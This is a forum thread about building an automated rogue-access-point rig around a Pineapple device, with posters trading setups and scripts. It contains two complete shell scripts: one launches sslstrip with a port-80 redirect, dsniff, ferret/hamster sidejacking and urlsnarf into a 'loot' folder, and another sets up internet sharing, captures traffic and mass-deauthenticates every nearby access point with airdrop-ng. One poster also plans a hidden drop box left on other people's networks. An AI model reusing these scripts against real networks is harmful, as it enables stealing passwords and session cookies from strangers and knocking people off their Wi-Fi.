Hardware Setups & Scripts


diggler

1. Is it true that we can use the airdrop-ng tool to deauth at the same time, on the same wireless adapter, that we are sharing internet from (ex. wlan0/mon0)?

2. Depending on the answer either A or B will be the better hardware setup.

A

- laptop with BT5R1 physically installed on entire disk

- connect to internet with wlan0 (built in laptop wireless adapter)

- deauth with wlan1 (USB wireless adapter -- ALFA)

- connect to AP51 MK3 with eth0 (built in laptop wired adapter)

or

B

- laptop with BT5R1 physically installed on entire disk

- connect to internet with wlan0 (built in laptop wireless adapter)

- deauth with wlan0 (at the same time with same wireless adapter)

- connect to AP51 MK3 with eth0 (built in laptop wired adapter)

3. I'd like to combine a number of scripts to function with this type of hardware / software setup. What I'm thinking is:

-first get internet going on the laptop (wicd or command based)

-run master script (wp3 on steroids)

-have all tools, besides karma, run off of BT5R1 (why? because of hardware storage/power/dependency restrictions/limitations)

-mk3 pineapple WEBGUI still very handy for watching connection / association / dhcp logs etc

-get the wp3.sh script to autostart karma

-in new steroid script setup:

xterm used for window control

ferret and hamster for sidejacking

sslstrip for https

dsniff for all other username/passwords (or ettercap)

urlsnarf to monitor visited urls

driftnet for fun

firefox needs to be configured with a proxy of 127.0.0.1:1234

url for hamster server is http://hamster

-tell these tools in a new script to log in a new folder on the desktop (or wherever) to make it easier to find all the new data instead of having to browse different directories per tool

4. I like the functionality these scripts offer, but they'll need some modification

-http://www.backtrack-linux.org/forums/backtrack-5-experts-section/45123-another-script-sidejacking-%5Bsidejackssl-sh%5D.html

-http://teh-geek.com/?p=565

-itsm0ld's script

-obviously add as much to this to wp3.sh in the right order of operations

5. Goal being, connect all HW, turn-on laptop, get an internet connection, run one script (or two), follow prompts and start watching the goodness.

6. What seems messy in all these scripts is the different iptables rules for each one. I think the only rule that would need to be added to wp3.sh is the SSLSTRIP one

-iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080

7. have a terminal pop-up so you can launch airdrop-ng deauth when ready

-autolaunch terminal with Darren's airdrop-ng script for mass deauth except us (but make sure we still have to hit enter, in case we don't want or need to do this off the bat)

touch deauth.conf

nano deauth.conf

a/00:00:00:00:00:00|any <-- mac of our AP51 AP

d/any|any

airdrop-ng -i mon0 -t cap-01.csv -r deauth.conf

8. Assume that if the script were written now, BT5R1 has just had apt-get update; apt-get upgrade -y run on it. That updates sslstrip to 0.9 (latest) and all the tools to what we need, I believe.

Edited by diggler
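Items 3, 6 and 7 of the post above as one shell script, added here as an example; it is not diggler's script, wp3.sh or any of the linked scripts. It assumes setup A (Pineapple on eth0, the ALFA already in monitor mode as mon0, airdrop-ng on the PATH), sslstrip's default listener port 8080, and a placeholder BSSID 00:00:00:00:00:00 for the AP51. The loot directory name, the RUN dry-run variable and the function names are this example's own. With RUN=echo the functions print the commands instead of running them, which is how the rule file and the redirect rule can be checked before touching the laptop.

```shell
#!/bin/sh
# Added example, not diggler's post or wp3.sh. Implements three pieces of the
# wish list for setup A: one loot directory for every tool, a validated
# airdrop-ng rule file, and the sslstrip redirect for traffic forwarded from
# the Pineapple. Anything that touches the system goes through $RUN, so the
# functions can be exercised with RUN=echo on a machine that is not the laptop.
RUN=${RUN:-}
PINE_IF=${PINE_IF:-eth0}                 # interface facing the Pineapple (setup A)
SSLSTRIP_PORT=${SSLSTRIP_PORT:-8080}     # sslstrip's default -l port

# One timestamped directory so nothing has to be hunted down per tool.
new_log_dir() {
  d="${1:-/root/Desktop}/loot-$(date +%Y%m%d-%H%M%S)"
  mkdir -p "$d" && printf '%s\n' "$d"
}

# Strict MAC check. A typo in our AP's BSSID would silently turn the allow
# rule into a no-op and airdrop-ng would deauth our own Pineapple clients.
is_mac() {
  case "$1" in
    [0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]) return 0 ;;
    *) return 1 ;;
  esac
}

# airdrop-ng rules: a/<bssid>|<client> allows, d/<bssid>|<client> denies.
# First match wins, so every allow must sit above the final d/any|any.
#   $1 output file, remaining args: BSSIDs to leave alone (our AP, our uplink)
write_deauth_conf() {
  conf=$1; shift
  : > "$conf"
  for mac in "$@"; do
    is_mac "$mac" || { echo "refusing bad BSSID: $mac" >&2; return 1; }
    echo "a/$mac|any" >> "$conf"
  done
  echo "d/any|any" >> "$conf"
}

# sslstrip sees the Pineapple's clients only if port 80 is redirected in
# PREROUTING: forwarded packets never pass the OUTPUT chain, which only
# handles traffic the laptop generates itself.
#   $1 inbound interface, $2 sslstrip listen port
sslstrip_redirect() {
  $RUN iptables -t nat -A PREROUTING -i "$1" -p tcp --dport 80 -j REDIRECT --to-port "$2"
}

# Launch the stack from item 3, every tool logging into $1. Hamster's proxy
# is what Firefox gets pointed at (127.0.0.1:1234), as in the post.
start_tools() {
  loot=$1
  $RUN sslstrip -a -l "$SSLSTRIP_PORT" -w "$loot/sslstrip.log" &
  $RUN dsniff -i "$PINE_IF" -w "$loot/dsniff.log" &
  $RUN urlsnarf -i "$PINE_IF" > "$loot/urlsnarf.log" 2>&1 &
  $RUN ferret -i "$PINE_IF" > "$loot/ferret.log" 2>&1 &
  $RUN hamster > "$loot/hamster.log" 2>&1 &
  # item 7: the deauth waits for enter so it is not fired off the bat
  $RUN xterm -T "deauth (press enter to fire)" -e sh -c \
    "read x; airdrop-ng -i mon0 -t cap-01.csv -r $loot/deauth.conf" &
}

# Full run only when started with --run on the attack laptop.
if [ "${1:-}" = "--run" ]; then
  OUR_AP=${OUR_AP:-00:00:00:00:00:00}   # assumed placeholder: the AP51's BSSID
  loot=$(new_log_dir) || exit 1
  write_deauth_conf "$loot/deauth.conf" "$OUR_AP" || exit 1
  sslstrip_redirect "$PINE_IF" "$SSLSTRIP_PORT"
  start_tools "$loot"
  echo "logging to $loot; point Firefox at 127.0.0.1:1234 and open http://hamster"
fi
```

The redirect only covers the HTTP the Pineapple's clients send through the laptop; the laptop's own browsing is untouched, which is what you want when the same box is also your management station.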

1) pretty sure no

2) A

3) A bit overkill, I only load the tools I need at that time.

4) Add it, modify it, it's open source; I can almost guarantee you will run into issues though.

5) Cool

6) So modify it if you want it there. I might want to suggest man iptables

7) Easy enough to do inside a script, google if you don't know how.

8) Don't get what you are saying on this one. But I have a script to update BT5 and Metasploit and S.E.T. I made.


1. Why is there a deauth tool on the pineapple WEBGUI then? Because people are connecting through it sharing internet access, but we have the ability to deauth at the same time through it...

3. Agreed : / got a little carried away there... I would really like SSLSTRIP/DSNIFF/FERRET+HAMSTER to run off the bat (with airdrop-ng deauth option quickly accessible). Someone's already expressed some interest to help, so I'll post what is created in time.

Edited by diggler

Most people don't log in to FB, GMAIL, etc... their cookies do it for them. The chance that you catch someone logging in is lower than scraping cookies while they're browsing, especially in a deauth scenario.

I don't understand the need for side-jacking if you are using SSL Strip and can see Unames and Pwords.

Edited by diggler

This is right up my alley. I too want the "deauth everything around me then karma everyone to me and allow for remote gui/terminal access by me" process via scripting - but I want it done automatically at boot up. What I'm looking for is the perfect Svartkast/dropbox (see http://www.irongeek.com/i.php?page=videos/derbycon1/adrian-crenshaw-building-a-svartkast-cheap-hardware-to-leave-behind-on-someone-elses-network for terminology and the basic premise).

My noob brain encounters this problem: If you iwconfig a stock pineapple, you'll see mon.wlan0 - this is locked on channel 11 by default, thereby removing your ability to deauth people on any channel but 11 without bringing down this interface (airmon-ng stop mon.wlan0). So if you want to do the whole "deauth everyone around me", at bootup you'd have to either stop mon.wlan0 (no idea what this actually does/haven't figured it out yet) every time, or somehow prevent it from starting at bootup, then start airmon-ng on wlan0, do an airodump-ng that pipes all the BSSIDs and channels in range into your startup script, then airmon-ng stop mon0, restart it on those channels and deauth the BSSIDs one channel/bssid at a time. After everyone's deauth'd, you then bring mon.wlan0 back up (assuming Jasager somehow needs it) and start up karma. Then begin tcpdump/wireshark capturing for later consumption via scp.

I plan to accomplish this with a Raspberrypi (raspberrypi.org) but need to first confront the major issue of - by the time it deauths any and all AP's around it, won't people have rejoined their network? The deauth tests I've run against my crappy netgear router work only if I deauth with an external (not on pineapple) monitor mode enabled wifi adapter. When I deauth with the pineapple, it takes too long for the pineapple to get mon.wlan0 back up and running - my test laptop has already reconnected to my crap netgear. More tests with different routers need to be done for my results to be conclusive, and I need to find out what mon.wlan0 is all about...but the idea of a small box I can drop anywhere that houses a credit card sized computer and a pineapple that in total costs $70 is too amazing to pass up.


I apologize in advance, this will be a short reply because I'm on my phone.

If you invest in a different hardware setup, where you have two wireless adapters (ex. wlan0 and wlan1) and 1 ethernet adapter, you can use one to connect to the internet, one to run pineapple and karma and the spare wlan1 to issue deauths.


I am unsure whether it has been mentioned, but the pineapple can deauth clients for you.

It can do so even when running karma.

However, deauth is not working correctly through the pineapple interface, a fix has already been done and will be in the next firmware.

Best,

Sebkinne


I didn't know that, but it makes a big difference in how I'm thinking of setting up my system.

Can you explain why that's possible on the wireless interface of the pineapple and not the ALFA USB interface.

Also, what tool is issuing the deauth? Is it possible to use the airdrop-ng command that I've referenced in the first post of this thread?

Many thanks Seb... Cheers...

Edited by diggler

I think most people (well, I am, and the pineapple, but he's broken right now) are using aireplay-ng.

If you haven't seen this thread, check it out!

http://www.rx8club.com/showthread.php?t=180037

Seriously, it's interesting, grab a coke or a beer, something.


Is it possible to get airdrop-ng on the pineapple as well then? Otherwise, I would need the original HW setup in the first post of this thread (A), and airdrop-ng off the ALFA USB.


Here's the deal as I understand it Diggler - at current time, you can't deauth as you want to using the Pineapple. The *best* way to do it with current firmware is to have an alfa usb attached to your computer to do the deauths in addition to the pineapple running that will then offer up karma'd AP's to the kicked off victims. However, this all could change with Seb's mysterious new firmware - Seb, do you have an ETA on delivery of your new firmware? You rock man, can't wait to see what you have in store for us...maybe a little preview/changelog? :)

Hope this helps

telot


  • 1 year later...

Here's a script I made way back in 2011. It was meant to be used with the mark3, but I don't think anything has changed. This script makes some assumptions about your setup that you should verify/modify - it's all mentioned in the first blob of commented text. Hope it helps

#!/bin/sh
#telot presents....:::drum roll:::
#One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy!
#Note that this script makes quite a few assumptions. They are:
#You are using backtrack5R1.
#Your interface that is connecting to the internet is wlan0
#Your interface that is connecting to the pineapple is eth0
#You have an alfa realtek usb card capable of monitor mode plugged in.
#You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (it's at the very bottom of this script).
#You have not run wp3.sh or any other network configuration stuff.
#You have your pineapple configured to autostart karma at bootup.
#This script is meant to run on your laptop upon bootup.
#
#Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant.
#So the internet I'm serving up in my pentest lab is actually run through my cellphone.
#So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth.
#
#
#Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah
#
#
#I'm keeping most configuration and capture files on the desktop for ease (Jack.conf and the wireshark capture below are relative to this directory).
cd /root/Desktop/
#Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line.
#iwconfig wlan0 essid EssidOfAPyouWantToUse
#-B backgrounds the daemon, -Dwext selects the wext driver (the two are separate flags)
wpa_supplicant -B -Dwext -i wlan0 -c Jack.conf
dhclient wlan0
#Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary.
#Bring up Ethernet Interface directly connected to Pineapple
ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up
# Enable IP Forwarding
echo '1' > /proc/sys/net/ipv4/ip_forward
echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
cat /proc/sys/net/ipv4/ip_forward
#clear chains and rules (the nat table too, otherwise every re-run stacks another MASQUERADE rule)
iptables -X
iptables -F
iptables -t nat -F
echo iptables chains and rules cleared
#setup IP forwarding: new connections come in from the pineapple on eth0 and leave for the internet on wlan0
iptables -A FORWARD -i eth0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
echo IP Forwarding Enabled
#remove default route
route del default
echo Default route removed
#add default gateway (192.168.1.1 is my hotspot's address; dhclient normally sets this already, so change or drop these two lines if your upstream differs)
route add default gw 192.168.1.1 wlan0
echo Upstream Default Gateway Configured
#instructions
#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
ping -c3 172.16.42.1
if [ $? -eq 0 ]; then
echo "ICS configuration successful."
#echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
#echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
#echo "Enter Pineapple password if prompted"
#ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
fi
echo ""
echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!"
echo ""
#Now on to the fun stuff!
#
#
#
#Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit.
#Remember to screen -r back to it and get rid of it when you're done. (screen -d -m already detaches, so no trailing & is needed.)
screen -d -m wireshark -i eth0 -k -w sharkcap
#This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop).
#This is also created in a detached screen. So remember to cleanup when you're done!
#
#
#Now we deauth every access point around us. Make sure to set a conf file (in my case, I call it yourescrewed.conf) for airdrop with your allows and denys.
#I set mine to allow the pineapple & my hotspot and deny everyone else.
ifconfig wlan1 up
airmon-ng start wlan1
#the conf file and the airodump csv are both read relative to this directory
cd /pentest/wireless/airdrop-ng/
#airodump-ng numbers its output files, so clear old ones or the csv below is capfile-02.csv on the second run
rm -f capfile-*.csv
screen -d -m airodump-ng mon0 -w capfile --output-format csv
sleep 20
python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf
telot
Edited by telot

Many thanks!


Ooo! I have the best answer? Mr. P, where do I find the reward pastries?

;) Glad I could help

telot
